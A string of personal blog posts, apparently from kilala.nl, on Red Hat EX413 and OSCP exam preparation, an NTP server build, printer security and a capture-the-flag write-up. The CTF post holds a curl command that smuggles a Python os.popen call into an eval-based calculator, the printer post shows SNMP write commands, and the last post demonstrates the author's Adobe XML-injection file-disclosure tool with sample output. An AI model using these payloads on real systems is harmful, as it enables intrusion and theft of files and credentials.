I prepared for the exam by following Sander van Vugt's Linux Security Hardening video training, at SafariBooks Online. Sander's course focuses on both EX413 and LPI-3 303, so there was quite a bit of material which did not apply to my specific exam. No worries, because it's always useful to repeat known information and to learn new things. Alongside Sander's course I spent a lot of time experimenting in my VM test lab and doing more research with Internet resources. Unfortunately I found Sander's course to be lacking content for one or two key areas of EX413. We have discussed the issues I had with his training and he's assured me that my feedback will find its way into a future update. Good to know. 

Taking the exam was similar to my previous RedHat Kiosk experiences. Back in 2013 I was one of the first hundred people to take a Kiosk exam in the Netherlands (still have the keychain lying around somewhere) and the overall experience is still the same. One change: instead of the workstation with cameras mounted everywhere, I had to work with a Lenovo laptop (good screen, but tiny fonts). The proctor via live chat was polite and responded quickly to my questions.

Now... I said I spent seven hours on the exam: I took it twice. 

Friday 27/10 I needed the full four hours and had not fully finished by the time my clock reached 00:00. This was due to two issues: first, Sander's course had missed one topic completely and second, I had a suspicion that one particular task was literally impossible. Leaving for home, I had a feeling that it could be a narrow "pass". A few hours later I received the verdict: 168/300 points, with 210 being the passing grade. A fail.

I was SO angry! With myself of course, because I felt that I'd messed up something horribly! I knew I hadn't done well, but I didn't expect a 56% score. I put all that anger to good use and booked a retake of the exam immediately. That weekend I spent twelve hours boning up on my problem areas and reviewing the rest.

Come Monday, I arrived at the now familiar laptop first thing in the morning. BAM! BAM! BAM! Most of the tasks I was given were hammered out in quick succession, with a few taking some time because of lengthy command runtimes. In the end I had only one task left: the one which I suspected to be impossible. 

I spoke to the proctor twice about this issue. The first time (1.5 hours into the test) I provided full details of the issue and my explanation for why the task is impossible. The proctor took it up with RedHat support and half an hour later the reply was "this is as intended and is a problem for you to solve". Now I cannot provide you with details about the task, so I'll give you an analogy instead. Task: "Here's a filled-out and signed form. And over here you will find the personnel files for a few employees. Using the signature on the form, ascertain which employee signed the form. Then use his/her personal details to set up a new file.". However, when inspecting the form, you find the signature box to be empty. Blank. There is no signature. 

After finishing all other work I spoke to the proctor again, to reiterate my wish for RedHat to step in. The reply was the same: it works as intended and complaints may be sent to certification-team@. Fine. Since I'd finished all other tasks (and rebooted at least six times along the way to ensure all my work was sound), I finished the exam assuming I'd get a passing score anyway. I felt good! I'd had a good day, banged out the exam in respectable time and I had improved upon my previous results a lot!

I took their suggestion and emailed the Cert Team about the impossible question. Both to help them improve their exams and to get a few extra points on my final score.

A few hours later I was livid.

The results were in: 190/300 points: 63%, where 70% is needed for a pass. All my improved work, with only one unfinished task, had apparently only led to a 22-point increase?! And somewhere along the way RedHat says I just left >30% of my points lying around?! No fscking way. 

I sent a follow-up to my first email, politely asking RedHat to consider the impossible assignment, but also to give my exam results a review. I sincerely suspect problems with the automated scoring on my test, because for the life of me I cannot imagine where I went so horribly wrong to miss out on 30% of the full score!

This morning, twenty-four hours after my last email to the Cert Team, I got a new email from the RH Exam Results system. My -first- exam was given a passing score of 210/300. No further feedback at all, just the passing score on the first sitting. 

While I'm very happy to have gotten the EX413, this of course leaves me with some unresolved questions. All three have been fired in RedHat's direction; I hope to have some answers by the end of the week. 

 

In closing I'd like to say that, despite my bad experiences, I still value RedHat for what they do. They provide solid products (RHEL, IDM/IPA and their many other tools) and their practical exams are important to a field of work rife with simple multiple-choice questions. This is exactly why my less-than-optimal experience saddens me: it mars the great things RedHat do!

 

Update 2017-11-02:

This morning I received an email from the Certification Team at RedHat, informing me that my report of the bugged assignment was warranted. They had made an update to the exam which apparently had not been fully tested, allowing the problem I ran into to make it into the production exams. RedHat will be A) updating the exam to resolve the issue and B) reissuing scores for other affected candidates. 


kilala.nl tags: , ,

View or add comments (curr. 12)

EX413 prep: my cheat sheet

2017-10-29 12:56:00

I used Sander van Vugt's EX413/LPI3 video training to prep for my EX413 exam and expanded upon all that information by performing additional research. All in all, I've spent roughly sixty hours over the past five weeks in order to get up to speed. Over the course of those weeks I compiled over fifty pages of notes. :)

I've extracted all the really important information from my notes, to make this seven-page EX413 cheat sheet. I hope other students find it useful.

Of course, this is NO SUBSTITUTE for doing your own studying and research. Be sure to put in your time, experimenting with all the software you'll need to know. The summary is based on my own knowledge and experience, so I'm sure I've left out lots of things that other people might need to learn.


kilala.nl tags: , ,

View or add comments (curr. 0)

RHEL / CentOS / Fedora: NetworkManager or dhclient messing with network and DNS settings?

2017-10-28 08:53:00

In my test networks at home I've often run into issues with NetworkManager or dhclient messing with my network settings, most importantly the DNS configuration. Judging by the hundreds of StackExchange and other forum posts to the same effect, I'm certainly not alone. The fact that this seems like such a newbie problem just makes it all the more annoying. 

I've tried many changes, based on those forum discussions, such as:
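(For illustration, think of the usual suspects from those threads; file names assume a RHEL-style ifcfg setup:)

# /etc/sysconfig/network-scripts/ifcfg-eth0
PEERDNS=no
NM_CONTROLLED=no

# /etc/NetworkManager/NetworkManager.conf
[main]
dns=none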

And funnily enough, things would still be changing my /etc/resolv.conf every time networking was restarted.

Turns out that I am in fact making a RedHat-newbie mistake! I'm stuck in my old ways of manually micro-managing specific settings of a Linux box. I'm so stuck that I've forgotten my lessons from the RHCSA certification: system-config-network-tui

That tool is great at resetting your network config and overwriting it with the exact setup you want. It helps clear out any settings in odd places that might lead to the continuous mucking about with your settings. 


kilala.nl tags: , ,

View or add comments (curr. 0)

PvIB CTF 2017: pen.test event

2017-10-08 10:29:00

the scoreboard

For the third year in a row I competed in the PvIB CTF "Pen.test event", a Jeopardy-style CTF where contestants race to solve puzzles and small hacking challenges. Last year I didn't fare very well at all, but this time around things went great! The crowd was nice, my table companions were cool, it was great talking to Anko again and the DJ played awesome beats. I had a blast!

Around 1.5 hours into the competition I went to stretch my legs and get a drink, enjoying the fun we were having. Looking around, sipping on my cola, I noticed something odd about the scoreboard! By the time I'd managed to grab my phonecam I'd already been surpassed by one team, but for at least a short while I'd managed to be #4 out of the pack of 51 contestants. In the end I finished somewhere halfway, because greater minds than mine managed to keep on scoring points :)

pvib ctf scoreboard

Like before, the challenges were divided into various categories (shown above) and ranked from easy to hard, resulting in different scores per item. I finished the night with 100.000 points (3x10e3, 2x10e4, 1x10e3). I was so, so close on another 10k and 30k points which is why I stuck around until the very last minute!

Web:

  1. I let myself be fooled by the easy Web challenge for way too long. The challenge presented you with a SquirrelMail login page and the task to login and get their email. Taking it for a genuine SquirrelMail install, I assumed no easy software vulnerabilities would be found, so I resorted to password guessing. An hour before the end of the night, Anko asked me "When we start out web pen testing, what are the things you're taught first?". Me: "Well... I reckon... You mean XSS, CSRF and SQL Injection, right?" A: "Absolutely." Me: "Sonuvabitch...". Turns out it was NOT SquirrelMail, just a quick and easy SQLi exercise made to look like it. 
  2. This challenge sent you to an online calculator which would help the voting committee tally their votes, in this case a basic formula line which would return the outcome. Entering gibberish into the line would return a basic Python EVAL failure. Turns out that it was possible to run OS commands through the EVAL calculation line, which let me list the remote files and grab the required flag.
  3. Both this exercise and #2 were a bit slow to respond in my browser, so I turned to the Lynx text-based browser. This foregoes all CSS, which was being loaded from the Internet. This time around we were supposed to hack a voting system, to find out the vote total for each candidate. I noticed that it was based on a JSP that got included by URL, so I downloaded it for further analysis. This code showed me that the voting process makes SOAP calls to retrieve candidates and to place a vote. It also gave me examples of the XML data needed for those SOAP calls. From here on out, my challenge was to find out how to get voting results instead! I haven't worked with SOAP a lot, but I knew there had to be some way of querying the remote end for available procedures and commands. This is where I learned about WSDL, which gave me exactly what I needed: a description of how to request voting results. This needed a little bit more tweaking to the XML, because the candidates were identified by an MD5 hash that needed to be updated as binary data. Darn! I was this close to getting the whole challenge, but a few minutes too late. 
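To illustrate the gist of challenge 2: if the calculator blindly eval()s your formula, you can smuggle in a Python expression that shells out to the OS. A hedged sketch with curl; the URL and parameter name are made up for this example:

# Submit a "formula" that imports os and runs a command; its output comes back in the response
curl 'http://calculator.example/calc' \
     --data-urlencode "formula=__import__('os').popen('ls -la').read()"
# Swapping 'ls -la' for something like 'cat flag.txt' then grabs the flag.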

Learning on the go was hella fun! I got to renew my experience with CURL calls and XML data and learned new things about SOAP. Nice!
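For challenge 3, the whole exercise boiled down to two kinds of curl calls: fetch the WSDL to learn which operations exist, then POST a tweaked SOAP envelope. A hedged sketch; the host, service and operation names are made up:

# The WSDL describes every operation the service exposes, including the results call
curl -s 'http://voting.example/VoteService?wsdl'

# POST the hand-tweaked envelope for the results operation (SOAP 1.1 style headers)
curl -s -H 'Content-Type: text/xml' -H 'SOAPAction: "getResults"' \
     --data @getresults.xml 'http://voting.example/VoteService'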

Crypto:

  1. I'd figured out the positional encryption scheme for this challenge pretty quickly, as it was clearly based on jumping and looping through the ASCII table, based on a character's position. Despite this, I must have made some stupid mistake in my method, because my decrypted text was repeatedly rejected. Again, I was this close to cracking it, but too little too late. 
  2. We were provided with two enigmatic strings and an encrypted ZIP file. Had no idea how to proceed with this one just yet.
  3. We're provided with Python code for a home-brew crypto, as well as some sample data. Given enough time I'm sure I could have figured out the issue at hand, but in this case ${ENOUGH_TIME} would -GT 2d. So never mind ;)

Cracking crypto never was my strong point ;)

Forensics:

  1. We're given a .CRT certificate for a voting machine, which is supposedly fishy. Making it legible with the OpenSSL command line quickly shows the PvIB CTF flag (one-liners for all three items are sketched after this list).
  2. We're given a .DOCX file which was supposed to contain suspicious data. I simply used unzip to extract all the component files of the Word document and searched the various XML contents for the CTF flag. 
  3. We're given a .PNG image that supposedly contains hidden data. One ZSteg install later I have my flag. 
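The one-liners behind those three items, as a hedged sketch (the file names are made up):

openssl x509 -in voting-machine.crt -noout -text          # 1: make the certificate legible
unzip -o suspicious.docx -d docx/ && grep -ri pvib docx/  # 2: unpack the .DOCX and grep its XML parts
zsteg hidden.png                                          # 3: let zsteg dig through the PNG for stego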

Fun challenges! Not too hard so far.

Misc.:

  1. A PDF file with some hidden data in it. Opening the PDF with the viewer on my Kali box made the hidden data stand out as a fat blue box. Anko simply grepped for "-i pvib" through the strings output of the PDF and fared just as well :)
  2. Oooff! I wish I'd had my wife with me! She's great at logical reasoning :) This challenge combined logic (determine whether persons A, B and C are lying or tell the truth), math (Fibonacci and Harshad numbers) and programming (because there's no plausible way of quickly solving the puzzle on paper). Seeing how I can't ever get my ideas straight with the liars/truthers, I skipped this one after about half an hour. 

What a great evening! Better yet, on the way home I managed to get on the Slam! night show and I won a DAB+ radio for our home! :D Awesome-cakes!


kilala.nl tags: , ,

View or add comments (curr. 0)

WTF HP? Your M203dn laser printer defaults to open SNMP write?!

2017-10-04 18:13:00

screenshot from the web interface

We've just bought a new laser printer, mostly for my daughter's schoolwork. Installation was a snap as both Windows and MacOS have made it a fool-proof process. MacOS even gave me a button labeled "Visit printer website"! Of course that's gonna pique my interest!

Yup, the HP Laserjet Pro M203dn (as it's fully named) has a wonderfully helpful web interface! By default, there's no username or password, there's no login prompt whatsoever. Just open for everyone to browse. Which is where I stumble upon the screenshot I'm showing above. Of course the SNMP community strings default to public/public. Why not? But who in the seven hells decided to make that SNMP daemon -writable-?! That's asking for trouble!

... aside from the "no username or password on the admin panel" of course. Ye gods! O_o

Oh and of course the certificate on the https web server was not signed by HP's CA. Because of course I wouldn't want to verify that nobody messed with the firmware or the certs on the printer. 

... *checks around* Yep, HP also don't have a bug bounty program. =_=
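For anyone who wants to check their own printer, a hedged sketch using the net-snmp tools; the address is made up and the community string is the default mentioned above:

# Read-only check: does the printer answer to the default "public" community?
snmpwalk -v2c -c public 192.168.1.50 system

# The scary part: with a writable community you can change settings remotely.
# Overwriting sysContact is harmless, but it proves write access.
snmpset -v2c -c public 192.168.1.50 sysContact.0 s "oops"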


kilala.nl tags: ,

View or add comments (curr. 1)

EX413 prep: messing with FreeIPA, Apache Directory Studio and MacOS

2017-10-01 21:44:00

Messing with FreeIPA

In preparation for my upcoming EX413 examination, I'm mucking about with FreeIPA

FreeIPA is an easy-to-set-up solution for building the basis of your corporate infrastructure on Linux. It includes an LDAP server, it sets up DNS and a CA (certificate authority) and it serves as a Kerberos server. Basically, it's a light version of Active Directory, but targeted at Linux networks. Of course Linux can use AD just fine, but if you don't have AD, FreeIPA is the next best thing.

IPA has come a long way over the past ten years. It might still not be fully featured, but it certainly allows you to set up a centralized RBAC platform, not unlike the BoKS product range I've worked with. BoKS offers more functionality (like a password safe and the possibility to easily filter SSH subsystems, such as allowing SCP or SFTP only), but it's also far from free. 

I'm currently doing exactly what the EX413 exam wants you to be able to do: install a basic FreeIPA environment, with some users and some centralized SUDO rules. It's the latter that was giving me a bit of a headache, because I had a hard time figuring out which service account to use for the bind action. Sander van Vugt's training video refers to the service account uid=sudo,cn=sysaccounts,dc=etc,dc=ex413,dc=local, which does not appear to exist out of the box. 

This set me off on a foxhunt that lasted 1.5 hours.

Because this is a sandbox environment, I've set up one account as both the SUDO bind user in /etc/sudo-ldap.conf and in the ADS user interface. Both now work swimmingly! I can "sudo -l" as a normal user and I can mess around in the LDAP tree from the warmth and comfort of my MacOS desktop :)
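In hindsight, a single ldapsearch against the IPA server would have spared me the 1.5 hour foxhunt. A hedged sketch, with the suffix borrowed from the example above:

# Bind as Directory Manager and ask where the sudo system account actually lives
ldapsearch -x -D "cn=Directory Manager" -W -b "dc=ex413,dc=local" "(uid=sudo)" dn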

EDIT:

Well I'll be a monkey's uncle! That little rascal of a UID=sudo was hiding inside LDAP all along! I guess I really did make a mistake in my initial ldappasswd command :D Well, at least I learned a thing or two!

EDIT 2:

FOUND IT! The DN I showed up top has an "s" too many! I wrote "sysaccountS", while it's supposed to be "sysaccount". Ace! That's going to make life a lot easier during the exam :)  


kilala.nl tags: , ,

View or add comments (curr. 0)

Speedrunning Redhat's EX413 exam

2017-09-21 15:16:00

booking confirmation

Over the past few weeks, I've been setting up a pen-testing coaching track for ITGilde. I'd planned my agenda for Q3/Q4/Q1 accordingly and had even accepted that my RHCSA and RHCE certifications would lapse in November. Unfortunately I couldn't get enough students together for this winter, so I'm putting the coaching track off until next spring. Huzzah, this frees up plenty of time for studying!

So... Now I'd like to try and retain my Redhat certs, for which I've worked so hard! My deadline's pretty close though, as November's right around the corner. After some investigation I concluded that the most productive way for me to retain these certs would be through passing one of the RHCA exams. EX413, pertaining to server security, is right up my alley! So, I'll be speedrunning the EX413 studies, trying to finish it all in five weeks' time!

I love a good challenge! ^_^


kilala.nl tags: , ,

View or add comments (curr. 2)

Building an on-premise Stratum-1 NTP server

2017-08-11 13:59:00

Recently I've been poking around NTP time servers with a few friends. Our goal was to create an autonomous, reliable and cheap NTP box that could act as an on-premise, in-house Stratum-1 time server. In a world filled with virtual machines that don't have their own hardware clocks, but whose applications demand very strict timekeeping, this can be a godsend.

I could write pages upon pages of what we've done, but the RPi Fatdog blog has a great article on the subject

Using just one Raspberry Pi and a reliable RTC (real-time clock) module you can create an inexpensive time server for your network. The RTC they're referring to supposedly drifts about a minute per year; still not awesome, but alright. *

This setup works well and Windows servers will happily make use of it! Linux NTP clients and other, stricter NTP software will balk at the fact that your Stratum-1 box was never synchronized with another time source. This is proven by the ntpdate command refusing to sync:

$ ntpdate timeserver
4 Mar 12:27:35 ntpdate[1258]: no server suitable for synchronization found

If you turn on the debugging output for ntpdate, you'll see an error that the reference time for the host is in 1900, which is the Epoch time for NTP. The example below shows reftime (though not in 1900):

ntpq> rv
status=0664 leap_none, sync_ntp, 6 events, event_peer/strat_chg
system="UNIX", leap=00, stratum=2, rootdelay=280.62,
rootdispersion=45.26, peer=11673, refid=128.4.1.20,
reftime=af00bb42.56111000  Fri, Jan 15 1993  4:25:38.336, poll=8,
clock=af00bbcd.8a5de000  Fri, Jan 15 1993  4:27:57.540, phase=21.147, freq=13319.46, compliance=2

The quick and easy work-around for this issue is to simply create both Stratum-1 and 2 in-house :) Have one RPi run as S-1, with 2 or 3 RPis working as S-2, that sync their time off the S-1 and who are peered among themselves. Any NTP client will then happily accept your S-2 boxes as NTP source. 
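A hedged sketch of what /etc/ntp.conf on one of the S-2 Pis could look like; the addresses are made up for this example:

# The S-1 Raspberry Pi with the RTC module
server 192.168.1.10 iburst
# The other S-2 Pis, peered among themselves
peer 192.168.1.12
peer 192.168.1.13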

Better than nothing! And cheap to boot. 

 

*: Remi Bergsma wrote an interesting article about Raspberry Pi clock accuracy, with and without RTC.


kilala.nl tags: , ,

View or add comments (curr. 0)

MacOS, Steam and legacy controllers

2017-06-27 06:39:00

Ten years ago, almost to the day, we bought a Playstation2 to play rhythm games like DDR and Guitar Hero. The console and its games have long since been relegated to storage, but one of the DualShock controllers is still with us in the living room. Our friend Baris once gifted us a LikSang SmartJoy Playstation2-to-USB converter, which I've been using in OpenEmu to play classic SNES games with my kid. 

In this month's Steam Summer Sale I grabbed two great games, "Ori" and "Hollow Knight", which play better using a controller. Unfortunately they don't recognize the SmartJoy out of the box, so I had to do some research. "JoystickMapper" to the rescue! It'll work with just about any controller and can be used to map buttons to keyboard actions, which most Mac and PC games support. Now I won't have to shell out bucks for a new controller! /o/ Well worth the five euros for JoystickMapper.


kilala.nl tags: ,

View or add comments (curr. 0)

Starting something new - SLAE: SecurityTube Linux Assembly Expert

2017-06-22 19:48:00

The ecstasy of achieving the OSCP certification didn't last long for me. Sure, I'm very happy and proud that I passed, but not two days later I was already yearning to move on! I wanted to get back to the PWK Labs, to finish the other thirty-odd servers. I wanted to retake the exam a second time. I wanted more challenge! So I set to making a list!

As something in between, I've signed up for SecurityTube's SLAE course: they teach you basic x86 assembly programming, to build and analyze Linux shellcode. Sounds very educational! And at only $150 for the course and exam it's a steal! I'll be blogging more about this in the future :)

Signing up for the course went easily and I got all the details within a day. However, actually getting the course files proved to be a struggle! There are three ZIP files, totalling roughly 7GB. They're stored in Amazon S3 buckets, which usually implies great delivery speeds. However, it seems that in this case SecurityTube have opted not to have any edge locations or POPs outside their basic US-WEST location. This means that I was sucking 7GB down a 14kbps straw :( That just won't do! Downloads were horribly slow!

After double-checking that the issue did not lie with our home network, I tried downloading the files onto my private server in the US: those speeds were great. However, pulling the files from my own server down to my laptop wasn't much faster. Darn. Maybe there's another hiccup? Two of my colleagues suggested using a VPN like PIA; sure, that's an option. But I've been meaning to look into Amazon's AWS service, which allows you to quickly spin up virtual machines across the globe, so I went with that. 

I built a basic Ubuntu server in Frankfurt and downloaded the files from the US. Seeing how both the source and destination were on Amazon's network, that went perfectly fine. Grabbing the files from my Frankfurt system also went swimmingly. So after two days of wrangling I finally have the course files on my laptop, ready to go :)


kilala.nl tags: , , ,

View or add comments (curr. 2)

OSCP: more questions

2017-05-25 18:12:00

Here's another question I've had a few times, which came to me again this weekend:

"I'm really surprised you had the confidence to tackle the exam with just 19.

Is this you bread and butter ? Was this simply to formalize existing knowledge for you ?"

To be honest, I was just as surprised that I passed! No, I don't have work experience in the field of pen-testing; I've only done two or three CTFs.

My original intention was to consider this exam a recon mission for my second attempt. I was sure that 19 out of 55+ hosts was not enough preparation for the exam. I went into the exam fully reconciled with the idea that failing was not just an option, but all but assured. The exam would be a training mission, to learn what to expect. 

The day before my exam I had practiced exploiting a known buffer overflow in EasyRMtoMP3Converter (EXE). Here's the CoreLan writeup from 2009. Using the approach I learned during the PWK class and by studying various published exploits, I built my own Python script to exploit the software. After some additional work, the code worked against both Windows 7 and XP. 

This extra practice paid off, because I managed to finish the BOF part of the exam within two hours. This was basically the wind in my sails that got me through the whole exam. After finishing the BOF I dared to hope that I might actually have a chance :) And I did. 


kilala.nl tags: , ,

View or add comments (curr. 0)

OSCP: Is the Pentesting With Kali (PWK) course worth it?

2017-05-23 14:07:00

One of my past colleagues reached out to me today, asking me this:

I'm still OSCP-wannaby, but probably it is too technical for me. I'm still not sure. Could you please share if a pre-exam training is worth its price or what is your practical - cutting of 'try harder' ;-) - advice to pass it?

I'll post my reply here, because I've been telling people this very thing for the past few weeks.

I've always thought OffSec's online PWK training to be well worth the money! $1150 gets you a huge PDF with all the course work, a few hours of videos and 90 days of lab access. It also includes your first exam attempt. For a training of this quality, that's really not a lot of money! You could even opt to pay less, getting only 30 or 60 days of lab access.

The classroom variant is something else entirely though. It's a LOT more expensive, at roughly $6000. That's for a week's on-site training, including a CTF event on one night. You also get the same PDF and videos, the included exam, but only 30 days of lab access. For me, it was well worth it because it was five days of non-stop hacking in a room with 30 other students and two top-notch trainers.  

Something that saved me time and money: during the classroom training you receive the two most important VMs, which you can use on your OWN laptop. Thanks to that, I didn't have to start my lab access until I'd finished >90% of my exercises. In the online PWK you use lab access to work on your exercises!  

The coursework is always worth doing before taking the exam: submitting a proper report of it may net you 5 bonus points on the exam, and submitting a pen-test report for the labs may net you a further 5. Against a minimum passing score of 70, those 10 points can really help a lot!  

So yeah. Definitely work through all the coursework to get into it and score points. Then play a lot in the labs, for both practice and more points. Then take the exam when your time's up. Always do the exam! Because if you fail your exam and then renew your labs, OffSec will include a "free" retake of your exam with the new lab time! Totally worth it! That way your "failed" exam becomes a recon mission that teaches you a lot!


kilala.nl tags: , ,

View or add comments (curr. 0)

Hooray for Google's free projects

2017-05-11 21:04:00

A few weeks ago, I reopened commenting on this site after having it locked behind logins for years. Since then the amount of spam submissions has been growing steadily. Sucks, so I finally took the time to implement proper spam checking. Enter Google's free project reCaptcha. Of course I realize that, if something's free on the web, it probably means that I'm the product being sold. I'll have to poke around the code to see what it actually does :)

CodexWorld have a great tutorial on getting reCaptcha to work in a basic script. Took me less than an hour to get it all set up! Lovely!
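For the curious: the server-side half boils down to one HTTPS call to Google's siteverify endpoint. A hedged sketch with curl; the secret and response token are placeholders:

# Verify the token that the browser widget handed back along with the form
curl -s https://www.google.com/recaptcha/api/siteverify \
     -d "secret=YOUR_SECRET_KEY" \
     -d "response=TOKEN_FROM_THE_FORM"
# Returns a small JSON blob; "success": true means the visitor passed the check.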


kilala.nl tags: ,

View or add comments (curr. 3)

I love Microsoft's documentation!

2017-05-09 10:24:00

Four Windows servers on one laptop

A bit over a year ago I first started working with Microsoft's Active Directory, integrating it with BoKS Access Control. At the time, I was impressed by Windows Server 2012 and 2016 and the ease with which I could set up an AD forest with users. 

I'm now learning how to build a two-tier PKI infrastructure, after seeing them in action at various previous clients. I've been on the consuming end of PKI for years now and I thought it was time to really know how the other end works as well! I must say that I love Microsoft's generosity when it comes to documentation! Not only do they provide proper product docs, but they also have online tutorials in the form of TLGs: test lab guides. Using these, you can self-teach the basics of a subject, and then build up from there.

The 2012 Base TLG helps you build a basic AD forest of systems. I can follow it up with the two-tier PKI infrastructure TLG, which helps me set up an offline root CA and an issuing CA, along with automatically enrolling any new systems in the network that need SSL certs. Awesome!

I'm similarly ecstatic about the performance of my Macbook Air. It's a tiny, super-portable system, but it still doesn't balk at running my usual applications plus four full-fledged Windows Server 2012 hosts. Nice!

EDIT:

Ammar Hasayen also did a nice write-up, which appears to be based upon the two-tier PKI TLG but which adds additional details.

Microsoft also offer a third great resource, their MVA: Microsoft Virtual Academy. It too has a course on two-tier PKI with ADCS


kilala.nl tags: , ,

View or add comments (curr. 0)

Learning Powershell? Mind your flags!

2017-05-09 08:54:00

I can't believe such a small, silly thing had me going for ten minutes!

When trying to retrieve a signed certificate from my ADCS rootCA, I kept getting a "file not found" error:

> certreq retrieve 2 .subCA.corp.contoso.com_subCA.crt
: The system cannot find the file specified. 0x80070002 (WIN32: 2)

Googling didn't lead to many results, but then I realized: Windows commands need to distinguish flags from their arguments, just like on any other OS. Doh! Forgot the minus!

>  certreq -retrieve 2 .subCA.corp.contoso.com_subCA.crt

Works just fine! 


kilala.nl tags: , ,

View or add comments (curr. 0)

PWK and OSCP: pointers and advise

2017-05-07 14:38:00

It's traditional to do a huge writeup after finishing the OSCP certification, but I'm not going to. People such as Dan Helton and Mike Czumak have done great jobs outlining the whole process of the course, the exercises, the labs and the exam. So I suggest you go and read their reviews. :)

In the meantime, here are the few things I would suggest to anyone undertaking PWK+OSCP. 

The day after finishing the exam was one of elation: I couldn't have been happier. But not a day later, I'm already missing the grueling work! I want to go back to the labs, to finish the remaining 30+ servers I hadn't cracked yet. I even want to retake the exam, to get more challenges! 

For now, my plan is as follows:

  1. First, I'm going to study to upgrade my RHCSA and RHCE to RHEL7.
  2. When I'm between assignments again, I will invest in more PWK labtime to practice with more target hosts. 
  3. Once I have finished the labs I will continue my journey with OffSec's CTP (Cracking The Perimeter) course and the OSCE exam. 

Back in college, René was right: "That guy just doesn't know the meaning of the word 'relaxation'."


kilala.nl tags: , ,

View or add comments (curr. 2)

OSCP exam: done and dusted

2017-05-03 15:34:00

What follows is a quote from a forum post I made today, originally in Dutch; just a braindump of how my past day went. 


Who's fried? I'm fried! /o/

I've got my OSCP exam behind me! It actually went quite a bit better than expected :D

I would have preferred to start yesterday around 0700-0800, but the earliest timeslot they offer starts at 1100. So I had from 1100 yesterday until about 4 hours ago to attack my targets. On top of that, I had from 1100 this morning until 1100 tomorrow to write up and hand in my test report. WELL! It's been quite a slog, but it's done. In the end I was at it for about 21 hours.

My tactic was to kick off a pile of scans in the background, so I could keep myself busy with the box that didn't need any scanning: the buffer overflow exercise. Around midnight I basically had enough points to pass, so bedtime!

But alas :D The adrenaline kept me from falling asleep! Got back up at 0200 and carried on. Around 0300 I started drafting my final report, and by 0630 it was pretty much done! I put some more time into that last privesc, but found nothing more. By 0830 I was so fried that I called it a day! I gathered all my documentation, checked everything over one last time and submitted it. 

Shower and collapse! Slept until about eleven and I'm already feeling a lot better! :)

I hadn't expected to get this far at all! Between all the stories on the OffSec forums of people freezing up completely, and my own past experience, I hadn't expected to crack more than one box. But with what I've achieved I should in principle already have enough points to pass, and of course I'm also hoping for the 5+5 bonus points for the lab reports I'm submitting. 

In any case, OffSec's confirmation of receipt has arrived. Now the waiting begins!


kilala.nl tags: ,

View or add comments (curr. 0)

OSCP exam: almost done

2017-05-03 06:41:00

4.5 hours left on the clock and I have four hosts fully rooted; on the fifth I have a low-priv shell. With the last one I decided to fsck it and use the MSF exploit, to save time :) I could've done it manually, but that would've cost me dearly in time. 

I didn't get any sleep because I was so strung out on adrenaline :D So after going to bed at 0015, I got up again at 0200. Got my foot in the door with the fifth host, then started writing my final report. Preparation and proper note taking works! In roughly 3.5 hours I have my report fully typed up! 

I can now investigate that last privesc at a leisurely pace :)


kilala.nl tags: ,

View or add comments (curr. 1)

Lab time's up! Only a few days left

2017-04-27 22:19:00

This morning my lab time for the PWK studies expired. I tied a ribbon around the lab report and I'm done! In just a week's time the lab penetration test report grew from 67 pages to 101! In total, I've cracked 18 of the 50+ servers and I'd made good progress on number 19. Not even halfway through the labs, but heck! I've learned SO much! I'm looking forward to Tuesday, even knowing up front that I will not pass. It's gonna be such a great experience! /o/

kilala.nl tags: , ,

View or add comments (curr. 0)

Why even study for OSCP if I can play Hacknet?!

2017-04-19 16:21:00

Way back in the day, my brother played Uplink pretty extensively. It was a great game for the time :) Now there's a new, indie hacking game called Hacknet! Seems like a worthy successor!

Ahh yes, running "Scan", "Porthack" and "SSHCrack 22" should suffice in any pen-testing situation! :)


kilala.nl tags: ,

View or add comments (curr. 0)

Almost ready for my first OSCP exam

2017-04-19 14:40:00

Covers of my reports

I sincerely doubt that I'm ready to pass the OSCP exam, but my first attempt is scheduled for May 2nd. My lab time's coming to a close in a little over a week, and so far I have fully exploited twelve systems and learned a tremendous amount of new things. It's been a wonderful experience!

In preparation for the exam, I have finally completed two reports for bonus points:

I've done my best to make the reports fit to my usual standards of documentation, so I'm pretty darn proud of the results! 

Let's see how things go in a week or two. I'll learn a lot during my first exam and after that I'll probably book more lab time. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

I've written my first exploit tool: XML injection in Adobe services leads to file disclosure

2017-04-07 21:35:00

Today I spent a few hours learning how to manually perform the actions that one would otherwise do with Metasploit's "auxiliary:scanner:adobe_xml_inject".

I built a standalone Bash script that uses Curl to submit the XML file to the vulnerable Adobe service(s), so the desired files can be read. Basically, it’s the Bash implementation of Exploit-DB’s multiple/dos/11529.txt (which is a PoC / paper). 

I've submitted this script to Offensive Security and I hope they'll consider adding it to their collection! The script is currently available from my GitHub repository -> adobe_xml_inject.sh

I'm darn happy with how the script turned out! I couldn't have made it this quickly without the valuable experience I've built at $PREVCLIENT, using Curl to work with the Nexpose and PingFederate APIs. 

EDIT: And it's up on Exploit-DB!

Here's a little show of what the script does!


root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -?

        adobe_xml_inject.sh [-?] [-d] [-s] [-b] -h host [-p port] [-f file]

	   -?   Show this help message.
	   -d   Debug mode, outputs more kruft on stdout.
	   -s   Use SSL / HTTPS, instead of HTTP.
	   -b	Break on the first valid answer found.
	   -h	Target host
	   -p	Target port, defaults to 8400.
	   -f	Full path to file to grab, defaults to /etc/passwd.

	This script exploits a known vulnerability in a set of Adobe applications. Using one 
	of a few possible URLs on the target host (-h) we attempt to read a file (-f) that is
	normally inaccessible. 

	NOTE: Windows paths use \, so be sure to properly escape them when using -f! For example:
	adobe_xml_inject.sh -h 192.168.1.20 -f c:\\coldfusion8\\lib\\password.properties
	adobe_xml_inject.sh -h 192.168.1.20 -f 'c:\coldfusion8\lib\password.properties'

	This script relies on CURL, so please have it in your PATH. 


root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -h 192.168.10.23 -p 80 -f 'c:\coldfusion8\lib\password.properties'
INFO 200 for http://192.168.10.23:80/flex2gateway/
INFO 200 for http://192.168.10.23:80/flex2gateway/http
Read from http://192.168.10.23:80/flex2gateway/http:
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><header name="AppendToGatewayUrl"><string>;jsessionid=f030d168c640a7d02d4036a3d3b7e4c35783</string></header>
<body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits>
<string>timestamp</string><string>headers</string><string>body</string>
<string>correlationId</string><string>messageId</string><string>timeToLive</string>
<string>clientId</string><string>destination</string></traits>
<double>1.491574892476E12</double><object><traits><string>DSId</string>
</traits><string>DCB6C381-FC19-7475-FC8F-9620278E2A14</string></object><null/>
